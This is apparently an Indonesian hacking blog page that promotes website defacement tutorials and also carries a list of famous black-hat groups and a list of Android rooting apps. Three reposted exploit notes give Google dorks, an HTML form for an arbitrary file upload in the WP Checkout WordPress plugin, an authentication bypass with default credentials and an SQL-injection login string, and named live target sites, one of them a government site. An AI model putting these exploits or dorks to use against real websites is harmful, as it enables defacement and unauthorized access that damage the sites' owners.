DEFACE METODE PUKIWIKI CREATE PAGE


Hallo,  selamat pagi kawan, dah bangun tidurnya? akhirnya bisa posting lagi, yang saya banggakan, dan kali ini admin akan share poc hasil riset E7B_404 yang akan di publikasikan buat kalian para hekel indonesia, berikut Tutorialnya sudah di jadiin dalam Vidio biar mempermudah anda memahaminya:) 
Dan untuk Dorknya : Disini 



Sumber : GSH


DEFACE METODE PHP FILE MANAGER UPLOAD SHELL


Setelah sekian lama saya tidak melakukan defacing, iseng iseng saya cari exploit dan langsung saya share sajah buat kalian yang ingin belajar deface. method php file manager upload shellNote : Maaf Suaaranya Terbata BataJangan Lupa Subscribe Juga Channelnya By : E7B_404From : Channel 4Sekawan Team : Garuda Security Hacker

Cara mencari Website yang terkena Hacked di GOOGLE


Hacking atau deface merupakan masalah security saat ini banyak sekali dialami oleh berbagai situs yang ada di Internet. Di Indonesia banyak sekali Web Pemerintah, pendidikan dan Umum yang di hack (deface) karena lama tidak diketahui oleh “pemilik web” Halaman yang di hack sempat terindex di Google. Ada yang lucu dan mengelitik, saya pernah meng-email admin sebuah situs “go.id” saya tidak sebut web-nya apa (dpu.****.go.id) . Saya email kominfo@…..go.id pada bulan Juli 2011 perihal sub domainnya kena hack, cuma dapat jawaban klu sub domain beda pengelolaannya dan email saya akan deberitahukan pada pengelola subdomain. Ketika saya browsing saat ini (11 Oktober 2011) ternyata webnya masih di HACK dengan tampilan lama dan web BASI tanpa ada update berita.
Saya sebagai orang biasa sebenarnya sangat prihatin melihat banyak sekali Kondisi web terutama Web Pemerintah yang tidak terawat dan Rentan terhapat serangan (hacking/deface). Yang Notabene Mereka memiliki dan mengelola web dengan UANG RAKYAT. Namun sepertinya sebagian mereka yang sudah kena Hack tidak sadar atau tidak tahu harus bagaimana. Bahkan email yang sring dicantumkan di web mereka kadang : tidak validtidak pernah dibukaover quota atau bahkan emailnya tidak ada (tidak pernah dibikin/dihapus). Sekali lagi sangat memprihatinkan sekali, Ketika terjadi kasus hacking ini merupakan tantangan bagi pengelola web bisa jadi terjadi kesalahan dalam mengelola web Institusi mereka.

Hacking di situs co.id

Umumnya pada Cracker /Hacker meninggalkan jejak berupa peringatan (tulisan) dan juga gambar/video bahkan musik mp3. Tulisan utama yang sering tampil berupa kalimat “Hacked by…” yang berisi inisial si Penyusup. Jika anda penasaran dengan Web yang sudah di HACK dan terindex di Google anda bisa menggunakan querry berikut untuk melihatnya. Memang tidak semua hasil adalah web yang di hack, ada yang berupa artikel hacking atau halaman yang di hack sudah diperbaiki. Namun saya masih menemukan banyak sekali web-web yang ter Hacked yang terindex di google. Anda bisa melihat dan mencari sendiri :
Tulisan ini tidak bermasud menggurui hanya sebagai bahan pengetahuan bersama, kerana ketika kita sudah mempublish sebuah web kita tidak akan bisa menjaga web kita sekama 24 Jam. Jika ada memang anda kenal dan menemukan web yang di Hack etika yang baik adalah segera mengingatkan pemilik web. Pemilik web yang baik juga seharusnya mengucapkan terima kasih karena sudah ada orang lain yang mengingatkan dan segera memperbaiki website yang terkena hack.

Website domain go.id di hack

Jika yang di hack adalah halaman depan (home) biasanya akan cepat ketahuan, namun banyak juga halaman yang di hack adalah sub domain atau apda sebuah artikel. Atau bahkan si-Cracker membuat subdmomain atau posting baru yang tidak langsung kelihatan di halaman muka. Memang tidak ada yang 100% aman dalam Web, saya juga pernah beberapa kali kena Deface (hack) baik hack indonesia maupun Luar negeri. Tidak ada Wesbite yang sempurnya namun kalu sudah di hack tidak bisa dibiarkan lama-lama, memalukan anda dan dan institusi anda.

Inilah 10 Grup Hacker Paling Terkenal di Dunia



Di dunia digital khususnya terkait black hat hackers, ada banyak grup hacker atau organisasi cracker yang memiliki reputasi mereka sendiri. Berikut ini merupakan 10 grup black hat hacker paling terkenal di dunia.

Sekilas Mengenai White Hacker dan Black Hat Hacker

Beberapa dari Anda mungkin sudah mengetahui bahwa kata hacker yang kita kenal sebagai "penjahat yang menyerang keamanan dunia digital" sebenarnya kurang tepat. Istilah yang benar adalah cracker dan hacker adalah sebenarnya merupakan si "polisi". Namun karena kata hacker sudah sangat umum maka asumsi dunia tidak mungkin diubah. Hal ini menyebabkan hacker dibagi menjadi 2, yakni white hat hacker dan black hat hacker.
White hat hacker adalah mereka yang dipekerjakan oleh sebuah perusahaan dengan tugas spesifik mencari kelalaian dalam keamanan digital dan membetulkan hal tersebut. Sedangkan black hat hacker adalah mereka yang secara sengaja melakukan pembobolan terhadap keamanan digital dengan alasan tertentu atau bahkan dapat bersifat personal. Daftar berikut ini adalah daftar grup atau perkumpulan hacker black hat paling terkenal dunia.
10. Global kOS
Ilustrasi Hacker
seperti arti nama mereka, Global kOS (dibaca "chaos" yang berarti "kekacauan"), bertujuan untuk menciptakan sebanyak mungkin kekacauan online yang dapat disebut dalam lingkup dunia atau global. Grup ini bertanggungjawab atas banyaknya alat-alat hacker otomatis yang ada di komunitas online, yakni sebuah kode yang dapat dijalankan dengan mudah tanpa perlu pengetahuan teknikal dan penyerangan dapat dengan mudah dilakukan.
Dibentuk pada tahun 1996 oleh seseorang dengan nama user AcidAngel, penyerangan telah dilakukan terhadap lebih dari 40 politisi, MTV dan Ku Klux Klan.
9. Level Seven Crew
Gambaran Hacker
Nama grup Level Seven Crew ini dipercaya didapatkan dari nama neraka tingkat 7 pada syair terkenal Dante Alighieri, "The Inferno." Hanya dari tahun 1999 saja, Level Seven telah berhasil memasuki lebih dari 60 sistem komputer termasuk di dalamnya adalah NASA, Bank Nasional Amerika, dan Hotel Sheraton.
Mereka juga merupakan grup yang terkenal atas aksi penyerangan mereka terhadap Kedutaan Amerika di Cina, dengan motif protes terhadap kesalahan pengemboman US terhadap kedutaan Cina. Kebanyakan tindakan mereka berdasar atas tindakan "hacktivism," yakni sebuah bentuk aktivisme online yang di luar dari tujuan pribadi. Walaupun pada tahun 2000 grup ini dibubarkan, pada 10 Februari 2013, grup ini dibentuk kembali.
8. globalHell
Global Hell
Grup hacker GlobalHell dapat dibandingkan dengan sebuah geng preman, bedanya tindakan mereka tidak dilakukan di jalan namun di dunia cyber. Dikatakan bahwa grup ini telah berhasil menyerang dan menghancurkan lebih dari 115 situs web, menyebabkan kerugian sebesar jutaan US Dollar dan memperjualbelikan informasi rahasia yang berhasil mereka curi.
Ironisnya, globalHell ternyata memang di-cofounder oleh salah satu anggota geng ternama Houston, US, yakni Patrick Gregory. Ia menjadikan komputer sebagai "jalan keluarnya" untuk kehidupan geng yang ia jalankan sebelumkan. Di sana ia mengkoordinasi lebih dari 60 anggota hacker.
Pada tahun 1999, co-founder Chad Davis ditangkap dengan hukuman penjara 6 bulan dan harus membayar kerugian sebesar 8.054 US Dollar atau setara dengan sekitar 96 Juta Rupiah. Ia berhasil mengganti kerugian tersebut sejak ia bekerja menjadi konsultan keamanan independen.
7. TeaMp0isoN
TeaMp0isoN
Seorang remaja berumur 16 tahun dengan nama user TriCk membentuk TeaMp0isoN pada tahun 2010. Grup ini bertanggung jawab atas penyerangan terhadap Facebook, NATO, dan Research In Motion (RIM) / BlackBerry. Mereka juga menyerang email mantan Perdana Menteri Inggris, Tony Baliar.
Motivasi grup ini adalah berbasis politik dengan dasar berusaha mengekspos pemerintahan internasional yang berusaha menyembunyikan kesalahan mereka. Grup ini juga melakukan tindakan penyerangan terhadap hotline Anti-Terorisme Inggris dengan membut telepon-telepon palsu yang terus berbunyi selama 24 jam (1 hari) sebagai bentuk protes terhadap ekstradisi tersangka teroris di US. 2 hari sesudah tindakan ini, pihak berwajib menangkap 2 remaja yang berumur 16 dan 17 tahun dan didakwa bersalah atas pelanggaran 2 hukum digital.
6. UGNazi
UGNazi
Underground Nazi Haktivist Group atau singkatnya dikenal sebagi UGNazi adalah grup hacker black hat yang terkenal atas tindakan penyerangan mereka terhadap beberapa situs pemerintahan Amerika. Aktivitas mereka sering berkaitan dengan membocorkan informasi pribadi dari berbagai pejabat pemerintahan.
Beberapa serangan mereka adalah terhadap Google, 4Chan, HostGator, Twitter, Departemen Militer Washington, dan banyak lainnya. Sesudah melakukan penyerangan terhadap Departemen Militer Washington, salah sat anggota UGNazi yang membocorkan informasi akun 17 user, termasuk di dalamnya adminstrator website, mengatakan ke SoftPedia: "Ini adalah lanjutan dari serangan kami terhadap wa.gov, terlepas dari hal ini, seperti yang kami katakan kami belum selesai dengan pemerintahan atau siapapun. Kami akan terus datang hingga setiap 'penjahat' yang dapat kami ketahui."
5. Network Crack Program Hacker Group (NCPH)
Tan Dailin AKA Wicked Rose
NCPH dibentuk pada tahun 1994 di Zigong, Cina. Diketahui pada tahun 2006, memiliki anggota 10 orang dengan 4 orang menjadi pemain utama dari grup ini dan pemimpinnya adalah hacker yang memiliki nama user Wicked Rose (diketahui nama aslinya adalah Tan Dailin). Seberapa besarnya grup sekarang ini sendiri tidak diketahui secara jelas.
Dimulai dari penyerangan terhadap banyak situs web asosiasi hacker Cina lainnya, hingga pada tahun 2006, melalui software buatan Wicked Rose, GinWui Rootkit, digunakan untuk menyerang Departemen Ketahanan Amerika. Pada akhir tahun itu, konsultasi keamanan Internet iDefense mengatakan grup ini telah melakukan penyerangan online yang dapat dikatakan berdampak besar.
Berdasarkan Wicked Rose, Network Crack Program Hacker Group (NCPH) ini ternyata dibayar atas pekerjaan mereka oleh sponsor misterius. Pada awalnya dibayar sebanyak 2000 Yuan per bulan atau setara dengan sekitar 3,9 Juta Rupiah, namun sejak penyerangan tahun 2006, diketahui bayaran tersebut meningkat hingga 5000 Yuan atau setara dengan sekitar 9,8 Juta Rupiah setiap bulannya.
4. LulzSec
LulzSec
Pada awalnya hanya beranggotakan 6 orang dan dibentuk pada tahun 2011, tepatnya pada tanggal 15 Mei. Nama LulzSec sendiri didapatkan dari slang Internet 'LOL' yang artinya tertawa terbahak-bahak. Salah satu moto LulzSec adalah "Menertawakan keamanan Anda sejak tahun 2011." 
Grup ini senang memperlihatkan kelalaian keamanan dan target-target mereka mencakup Fox.com, X-Factor, Sony, Nintendo, CIA, dan FBI. Dilaporkan bahwa penyerangan mereka telah menyebabkan kerugian miliaran US Dollar. Selain penyerangan-penyerangan ini, serangan-serangan mereka juga mencakup Bethesda Game Studios, Minecraft, League of Legends dan majalah online The Escapist.
Walaupun pada 26 Juni 2011, grup ini mengatakan bahwa mereka membubarkan diri mereka dengan merilis pernyataan '50 hari Lulz', ada sebuah situs bernama lulzsecurity.org, yang mengatakan bahwa LulzSec "lahir kembali." Dipercaya beberapa anggota LulzSec masih aktif hingga saat ini.
3. Masters of Deception
MOD Master of Deception
Merupakan grup hakcer New York yang dibentuk pada tahun 1989 dengan nama sebagai bentuk persaingan terhadap grup hacker di Texas. Untuk menunjukkan kekuatan mereka, anggota-anggota Masterof Deception melakukan tindakan penyerangan yang disebut sebagai "salah satu tindakan pencurian informasi komputer terbesar yang pernah diketahui."
Mereka membobol server yang terkenal solid dan berhasil mencuri berbagai informasi rahasia seperti salah satunya daftar transaksi kartu kredit miliki artis Julia Roberts, selain itu mereka juga berhasil membobol sistem komputer AT&T (perusahaan multinasional Amerika ternama dalam bidang telekomunikasi) dan mendapatkan berbagai nomor kartu kredit. Semua informasi rahasia itu dilaporkan dijual.
Kejayaan Master of Deception berakhir saat FBI dan Secret Service melakukan penangkapan atas tindakan mereka dan pada penangkapan tersebut 5 hacker terbaik grup itu berhasil ditangkap. Penangkapan ini berakhir dengan 5 tuntutan kejahatan digital yang semuanya terbukti bersalah.
2. Milw0rm
MilW0rm
Pada tahun 1998, sebuah grup hacktivis, MilW0rm, menyerang fasilitas riset nuklir utama milik India yakni Bhabha Atomic Reserach Center (BARC) sebagai protes anti-nuklir mereka. Beroperasi dari UK, US, Russia dan New Zealand, mereka berhasil membobol firewall fasilitas tersebut, mendapatkan email dan data riset terbaru, menghapus bersih data 2 dari 8 server yang ada, dan menulis pesan anti-nuclear pada situs web mereka. Hal ini sangatlah berdampak besar dan semua institusi serupa langsung meningkatkan keamanan mereka.
Yang mengagumkan adalah tindakan penyerangan tersebut memiliki anggota yang hanya berumur 15 tahun. 1 Bulan dari kejadian itu, nama MilW0rm lebih dikenal lagi karena berhasil menyerang perusahaan hosting EasySpace yang hanya dalam waktu 1 jam pesan anti-nuklir muncul di 300 situs web lainnya, termasuk di dalamnya adalah FIFA World Cup, Wibledon, Ritz Hotel, Keluarga Kerajaan Saudi.
1. Anonymous
Anonymous
Anonymous adalah grup hacker raksasa yang pada tahun 2012 memiliki anggota lebih dari 5.500 orang. Situs-situs digital yang pernah mereka serang adalah situs web FBI, departemen pertahanan, PayPal, MasterCard, Visa, Sony PlayStation network dan banyak lainnya. Bahkan mereka juga pernah mengancam Pentagon, Facebook, serta grup kartel narkoba Meksiko "Los Zetas". Mereka dikenal dengan atribut topeng Guy Fawkes, yakni topeng seperti pada film V for Vendetta.
Salah satu aksi mereka yang paling terkenal adalah saat mereka melakukan hacking ke jaringan Sony PlayStation, dengan motif melakukan protes atas gugatan hukum terhadap Geohot. Gehot adalah hacker yang berhasil membobol atau melakukan jailbreak terhadap sistem PS3 dan memperlihatkan proses tersebut di video pada YouTube. Yang membuat perkara ini menjadi besar dan membuat Anonymous bertindak adalah karena selain gugatan hukum, Sony meminta YouTube memperlihatkan IP Address dari semua orang yang menonton video tersebut. Banyak orang menganggap ini adalah tindakan pelanggaran privasi termasuk grup Anonymous.
Beberapa dari Anda mungkin pernah mendengar Anonymous Indonesia, namun pihak Anonymous mengatakan mereka sama sekali tidak terlibat dengan pihak Anonymous dari Indonesia. Moto grup ini adalah "Kami adalah Anonymous. Kami adalah Pasukan. Kami tidak memaafkan. Kami tidak melupakan. Tunggu Kami." Time bahkan menyebut grup ini sebagai salah satu grup dalam daftar "100 orang paling berpengaruh di dunia."
--
Ketahuilah bahwa black-hat hacker selalu memiliki resiko untuk ditangkap secara legal oleh pihak berwajib terkait atas tindakan mereka. Hal ini juga pernah terjadi pada 14 anggota Anonymous yang berhasil ditangkap FBI dari 1000 daftar IP Address, atas penyerangan mereka terhadap PayPal.

WordPress Plugins WP Checkout - Arbitrary File Upload


# Exploit Title: WordPress Plugins WP Checkout - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/wp-checkout
# Date: 13 June 2017
# Exploit Author: x0id
# Tested on: Windows 7

1) Search target with Google Dorking
inurl:/wp-content/plugins/wp-checkout
Index of /wp-content/plugins/wp-checkout/

2) Exploit the websites
https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php
Vulnerability? Page Blank!

3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

4) Result file access.
https://localhost/wp-content/uploads/wp-checkout/uploadify/random-file.html

EasyWebEditor 8.6 Authentication Bypass



# Exploit Title: EasyWebEditor 8.6 - Authentication Bypass
# Google Dork: inurl:ewt_news.php?nid=

# Date: 2017-06-16
# Exploit Author: Mersad Security Research
# Software Link: -
# Version: All Version
# Tested on: Kali Liunx
--------------------------------------
Exploit:/ewtadmin

http://127.0.0.1/ewtadmin
-------------------------------------
Live Demo:
http://203.150.225.0/ewtadmin/
http://www.ilovethaiculture.com/ewtadmin/
http://www.dmr.go.th/ewtadmin/
-------------------------------------
# Discovered By: Sh4dow (BlackPentester@Gmail.Com)
# We Are:Mersad (Mersad - Gray Industry)
# https://telegram.me/MersadGroup
# Mersad@Protonmail.Com

NB : ini poc bisa di pake sql / bypass admin

Zamikinfotech Admin-Login Bypass


Google Dork : Designed By zamikinfotech.in™
Tested on : Kali Linux
Data : 2017-06-01
Blog : http://www.trazer.org/
Forum : http://www.turkz.org/Forum/ 

Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345
OR
[+] Username: '=' 'or'
[+] Password: '=' 'or'

Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php

Kumpulan Apk Root Tanpa Pc



Root adalah suatu akun administrator di dalam OS Android yang memiliki kekuasaan mutlak guna mengakses dan mengeksekusi semua berkas, perintah, sistem dan kernel. Intinya, ROOT memiliki akses tanpa batas untuk mengubah, menghapus, menambah, bahkan merusak semua yang ada di dalam sistem Android.
Kelebihan perangkat Android yang telah di root :
  • Akses tak terbatas dalam sistem operasi Android.
  • Dapat menghapus aplikasi bawaan vendor yang tidak diinginkan oleh pengguna.
  • Dapat melakukan backup aplikasi dan sistem sehingga ketika ingin melakukan instal ulang atau reset pabrik, pengguna tidak perlu mencari dan mengunduh lagi
  • Dapat mengubah tampilan melalui instalasi custom ROM atau bahkan memutakhirkan ke versi yang lebih tinggi yang tidak dirilis oleh vendor.
  • Dapat melakukan Overclock prosesor sehingga kinerja ponsel manjadi lebih cepat.
Kekurangan perangkat Android yang telah di root :
  • Menghilangkan garansi
Berikut ini 11 aplikasi untuk memudahkan root di Android :
1. Framaroot
Lihat daftar list Android yang kompetibel dengan framaroot di sini
Compatibility for Qualcomm devices (Gandalf exploit only) :
ASUS Memopad FHD 10 LTE
Asus Padfone 1/2
Asus Padfone A66
Asus Padfone Infinity
Asus Transformer Pad Infinity TF700KL
Archos 50 Platinum
BLU Studio 5.3 S
BW T18+ (Fortis Evo)
Cloudfone Thrill 430x
Disgo 8400g
DNS S4504/S4503/S4502
FAEA F1
Gigabyte GSmart G1315 Skate
Gigabyte GSmart Rio R1
Google Nexus 4
Highscreen Spark/OMEGA Q/Blast/Strike/Boost
Hisense AD683G
HTC One S
Huawei Ascend G330D U8825D
Huawei Ascend G526
Huawei Honor Pro (U8950-1)
Huawei Premia 4g
Huawei U8815/U8816 Ascend G300/G301
Huawei U8825D Ascend G330D
Huawei Vitria Y301-A2
Huawei Y215
K-TOUCH TITAN S100
Karbonn Titanium S5
Kyocera Hydro Edge
Kyocera Hydro Xtrm
Kyocera Torque
Lenovo A600e
Lenovo A706
Lenovo S870E
LF-LTE3 (F260S)
LG Nitro HD
LG L1 II
LG L7 II P700/P710/P714/P715/P870
LG Lucid 2 (VS870)
LG Optimus Dynamic 2
LG Optimus F5 (P875)
LG Optimus F7
LG Optimus G E970/E975
LG Optimus L3 II E425
LG Optimus L5 E610/612/615
LG Optimus L7 II P710/P713/ P714/P715
LG Optimus L7 P700/Р705
LG Optimus LTE 2
MEDION LIFE P4013
Micromax A111 Canvas Doodle
Motorola Defy Mini XT321
Oppo Find 5
Orange Nivo
Orange Yumo
Orange Zali
Pantech Discover
Pantech Flex
Pantech IM-A840S Vega S5
Pantech Sky S5 A840S
Pentagram Combo
Phicomm i370w / i600 / i800
Samsung Galaxy Core i8260
Samsung Galaxy Express GT-I8730
Samsung Galaxy Win I8552
Sharp Aquos Phone SH930W
Smartfren Andromax U
Smartfren Andromax i2
Sony Xperia E C1505/Dual C1605
Sony Xperia L C210X
teXet TM-3204R
teXet TM-4677
Xiaomi Mi-2S
Yarvik Ingenia Compact SMP35-200
ZTE T83 (Telstra Dave)
ZTE V880G/ZTE V955
ZTE V9815 Grand Memo N5
ZTE Warp Sequent
Waiting feedbacks …
Compatibility for MTK devices (Boromir, Faramir and Barahir exploits only) :
A8 Alps
Acer A1-810
Acer A1-811
Acer B1-711
Acer Iconia A3-A10
Acer Liquid E2
Acer Liquid Z3
Alcatel 975N (Vodafone Smart 3)
Alcatel OT 4030D S’POP
Alcatel OT 8008D Scribe HD
Alcatel OT 997D
Alcatel OT Fierce
Alcatel OT Idol 6012X / Le Mobile Sosh / Orange Hiro
Alcatel OT Idol 6030X/6030D/6030H
Alcatel OT Scribe Easy 8000a
Alcatel OT Star 6010X
Alcatel OT Pop C5
Alcatel OT Ultra 6033x
Alcatel OT X’Pop 5035D
Amoi N828
Archos 40 Titanium
Arc Mobile 350D
ASUS Memo Pad HD 7
atab4w
AVUS A24
BEDOVE X12
Blu Dash 5.0
Blu Life Play
BLU ONE X
BLU Studio 5.0 / 5.5 / 5.5S
BQ Aquaris 5 / 5.7
BQ Elcano
Brondi Glory 2
Cat B15
Changhong z9
Charmpin (UTime) G7
Cherry Mobile Amber
Cherry Mobile Burst 2
Cherry Mobile Cosmos S
Cherry Mobile Cosmos X
Cherry Mobile Omega XL
Cherry Mobile Thunder 2.0
Chinese Star S7589
Chuwi VX1
Coolbox Quore v57
Coolpad F1 (8297)
Cube U39GT 3G (CubeTalk 9)
Cube U51GT C4
Cube U55GT (CubeTalk 79)
Cubot A890
CUBOT GT90 / GT99
CUBOT ONE
CUBOT X6 / P6
DAXIAN XY100S
Doogee DG200 Hotwind
Doogee DG350
Evercoss A7S
Excelvan ET704
Explay HD Quad
Explay infinity II
Explay Polo
Explay Surfer 7.32 3G
Explay Surfer 8.31 3G
Explay X-Tremer
Fly IQ440 Energie
Fly IQ441 Radiance
Fly IQ442 Miracle
Fly IQ443 Trend
Fly IQ446 Magic
Fly IQ450 Quattro Horizon 2
Fly IQ451
Gionee 868H
Gionee E7 mini
Gionee Elife E3
Gionee GN 708
Gionee Pioneer P2
GoClever Fone 570Q
GoClever Quantum 4
GoClever Tab M713G
Goophone N3
GSmart Aku A1
GSmart Sierra S1
GuoPhone G9002
Haier W718
Haipai I9389
HDC I9500/N9006
Highscreen Alpha GTX
Hisense U970
HKC Q79 3G
Hosin v70
Huawei U8836D G500 Pro
Huawei G610-U00 / G610-U20
Huawei G700-U10 / G700-U20
Huawei Ascend G730
Huawei Y320
Huawei Y511
HTM A6
HTM M1/M3
HUMMER H1+
iBall Slide 3G Q1035
IconBIT NetTAB Space 3G Duo
IconBIT NetTAB Mercury Q7
I-mobile series I-style 7.2
Inco Colossus II
INEW I6000+
iNEW V3
Intex Aqua HD
iOcean X7
iWING WTD2
Jiake JK 11
Jiayu F1
Jiayu G2
Jiayu G3S
Jiayu G4
Just5 Spacer
Karbonn A1 / A30 / A9+
Karbonn Titanium S2
Kata i3
Kata Venus 3
KENEKSI Beta
KingTopKt07
Kvd N3+
LANIX ILIUM S600
Lava iris 405 / 503
Lenovo A3300
Lenovo B8000-H
Lenovo 10.1″ Tablet S6000
Lenovo IdeaPhone P700i
Lenovo IdeaPhone S720
Lenovo IdeaTab A3000-H
Lenovo IdeaTab S6000-H
Lenovo P770/P780
Lenovo S890, S720, S820, S920, A390, A850, A516, A656, A368i, A369i, A859
Lenovo S5000-H
Lenovo S6000-F
Lenovo Yoga 8 / 10
Le Pan TC802a
M-Pai 809T
M4tel SS1060
Mi354 “Spice Smart Flo Space”
Micromax A58
Micromax A89 Ninja
Micromax A90
Micromax A114 / A117
Micromax A115 Canvas 3D
Micromax Canvas 2 Colors A120
Micromax Canvas 2 Plus
Micromax Canvas 4 A210
Micromax Canvas EGO A113
Micromax Canvas HD
Mlais MX70
MoreFine S6 Pro
Motorola RAZR D1
Motorola RAZR D3
MSI primo 76
MyPhone Agua Iceberg
Mysaga C2
N800 Mini Note
Neken N6
NEO N003 Advance
Newman N1 / K18
Nexa Vega N4
NGM Forward Prime
NGM Forward Young
NGM Dynamic Racing GP
No.1 S7
Omate TrueSmart
Onda v819 3G tablet
OPPO Find Clover
Oppo find 5 mini
Oppo findway U7015
OUMEI X5
Overmax Vertis-01/01+
Overmax Vertis-02/02+
Pantech Vega LTE Ex (IM-820L)
Pearl Smartwatch AW-414
Philips W536
Philips W736
Phoenix Rockx1
PocketBook SURFpad 3
Prestigio Multipad 4 Quantum
Prestigio MultiPhone 4055
Prestigio MultiPhone PAP 3350/3400/4505/5044 DUO
Runbo x5 / x6
S09 W63 IP68
Sesonn N9200+
Sharp AQUOS SH837W
Shengda S4
Sky Vega A800S
Smartfren Andromax V
Star HD9000+
Star N8000
Star N9800
Star S5 Butterfly
Star S6
Star S9500
Starmobile Diamond V3
Starmobile Knight
Symphony Xplorer ZII
Tecno R7
TeXet NaviPad TM-7055HD
Texet TM-5277
THL T100S / T200
THL V12
THL W8 Beyond
THL W8S
THL W11
THL W100(S) (130711)
THL W200(S)
Tronsmart TS7
Ulefone u7
Utime U100S
Vonino Ego QS
Vonino Sirius QS
Xiaocai X9
Xiaomi Hongmi / Redmi
Xolo A600/Q700/Q800/Q3000
Zen Ultrafone 701HD
ZOPO 980/990
ZOPO C2 Platinum
ZOPO C3
ZOPO ZP910
ZOPO ZP300+ / ZP500+
ZOPO ZP900 Leader
ZOPO ZP950H
ZOPO ZP990+
ZOPO ZP998
ZTE BLADE G2 V880H
ZTE BLADE Q
ZTE BLADE Q MAXI / MINI
ZTE Kis
ZTE Leo S1
ZTE N986
ZTE Open
ZTE Roamer 2
ZTE V795
ZTE V880G/H
ZTE V967S
ZTE V987 Grand X Quad
Walpad
Walton Primo F3i / G1 / H2 / EF
Wiko Cink Peax 2
Wiko Darkfull
Wiko Darknight
Wiko Darkmoon
Wiko Iggy
Wiko Ozzy
Wiko Rainbow
Wiko Stairway
Waiting feedbacks …
Compatibility for Huawei K3V2 devices (Pippin exploit only) :
Huawei Ascend D1 Quad XL U9510E
Huawei Ascend G615
Huawei Ascend Mate
Huawei Honor 2
Huawei MediaPad 10 Link
Waiting feedbacks …
Compatibility for AMLogic devices (Gollum exploit only) :
Waiting feedbacks …
Compatibility for Samsung devices (Legolas and Aragorn exploits only) :
Samsung Galaxy Core GT-I8262
Samsung Galaxy S Aviator
Samsung Galaxy S M110S
Samsung Galaxy Proclaim S720C
Samsung Galaxy Young GT-S6312/GT-S6310
Samsung Illusion SCH-I110
Samsung Lightray SCH-R940
Waiting feedbacks …
Compatibility for Exynos devices (Sam, Frodo, Legolas and Aragorn exploits only) :
AT&T Galaxy Note 2 SGH-I317
Highscreen Explosion
Hyundai T10
Hyundai T7s
Impression 9702 (Exynos 4412)
Lenovo K860/К860i
Newman N2
Meizu MX2
Samsung Galaxy Camera EK-GC100
Samsung Galaxy Note 10.1 GT-N8000, GT-N8010, GT-N8013, GT-N8020
Samsung Galaxy Note 2 GT-N7100
Samsung Galaxy Note 2 LTE GT-N7105
Samsung Galaxy Note 8.0
Samsung Galaxy Note GT-N7000
Samsung Galaxy S GT-i9000
Samsung Galaxy S2 AT&T SGH-I777
Samsung Galaxy S2 Epic 4G Touch – SPH-D710
Samsung Galaxy S2 GT-I9100
Samsung Galaxy S3 GT-I9300
Samsung Galaxy S3 LTE GT-I9305
Samsung Galaxy Tab Plus GT-P6200/GT-P6210
Samsung Galaxy Tab 7.7 GT-P6800/GT-P6810
Samsung Galaxy Tab 7.7 SCH-i815
Samsung SGH-i997 Infuse 4G
T-Mobile Galaxy Note 2 T-889
Verizon Galaxy Note 2 SCH-I605
iBerry Auxus CoreX2 3G and CoreX4 3G
Compatibility for Omap36XX devices (Gimli exploit only) :
Archos Gen8
Cliq 2 MB611
Coolpad Quattro 4G
Droid 2 (a955)
Droid 2 Global (a956)
Droid X (MB810)
LG Marquee LS855
LG P970 Optimus Black
Motorola DEFY+ (MB525 / MB526)
Motorola Droid PRO
Motorola Droid X
Motorola Milestone 2
Motorola XPRT
Parrot ASTEROID Smart
R2D2 (a957)
Cara penggunaan framaroot :
  • Pilih “Install Superuser” pada pilihan framaroot
  • Pilih salah satu eksploit yang sesuai  dan tunggu hingga selesai. Ada banyak pilhan exploit, coba satu per satu bila tidak tahu pakai exploit yang ingin digunakan.
  • Jika keluar pesan “Success … Superuser and su binary installed. You have to reboot your device” berarti proses root berhasil lalu nyalakan ulang android.
  • Jika keluar pesan “Failed … Try another exploit if available” proses root gagal silahkan ganti dengan eksploit yang lain.
  • Jika keluar pesan “Check vulnerabilities” your device seems not vulnerable to exploit included in framaroot berarti perangkat tidak didukung oleh framaroot.
2. Root Genius Mobile
Compatibility:
  • Galaxy Young S6310
  • Galaxy Grand Duos
  • Advan S4A
  • Advan S4D Gaia
  • Advan S3A
  • Advan S5
  • Advan S5E Pro
  • Mito A75
  • Galaxy S Advance i9070
  • Smartfren Tab 7.0
    Andromax V2
  • Motorola RAZR M xt907
  • Galaxy S3 GT-I9300
  • Galaxy Note 2 Kitkat
  • Treq Q1
  • Lenovo A3300
  • Axioo Pico pad
  • Oppo R2001
  • Mito A77
  • dan masih banyak lagi
Cara pengunaan root genius :
  • Tap lingkaran bertulisan root,.
  • Jika terlihat permintaan install aplikasi Root tap “Install”.
  • Tunggu hingga selesai dan reboot, jika berhasil akan ada aplikasi kinguser.
  • Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
3. iRoot
  • Compatibility :
  • Polytron W1351
  • Polytron R1500
  • Galaxy Ace 3
  • Himax polymer octacore
  • Mito A50
  • Imo Tab Z8 Nero
  • Imo Q8
  • Galaxy S3 mini
  • Tab 3 Lite SM-T111
  • Evercoss Elevate Y2
  • Hp 7 Voicetab
  • Lenovo A269i
  • dan masih banyak lagi (silakan dicoba)
Cara pengunaan iroot :
  • Tap tombol hijau “root”.
  • Jika berhasil akan terlihat gambar android tersenyum
  • Cek dengan aplikasi root checker untuk mengetahui apakah Android sudah berhasil di root atau gagal.  (Root checker dapat di unduh gratis di play store)
4. Vroot
Compatibility :
  • Lenovo A706
  • MediaPad 10
  • OptimusL5 e610
  • Galaxy Ace 3
  • Galaxy S3 Mini
  • Nokia X
  • Andromax i3S
  • dan masih banyak lagi (silakan dicoba)
5. KingRoot
  • Compatibility :
  • Galaxy Grand Duos
  • Galaxy Grand Neo
  • Xperia J
  • K-Touch Octa
  • Andromax i3
  • Mito A810
  • Advan T1i
  • Mito A850
  • Google/Nexus devices
  • HTC devices
  • ZTE devices
  • Sony supported devices
  • LG devices
  • Samsung devices
  • Huawei devices
  • dan masih banyak lagi (silakan dicoba)
Cara pengunaan KingRoot:
  • Tap lingkaran warna hijau root, tunggu proses hingga selesai.
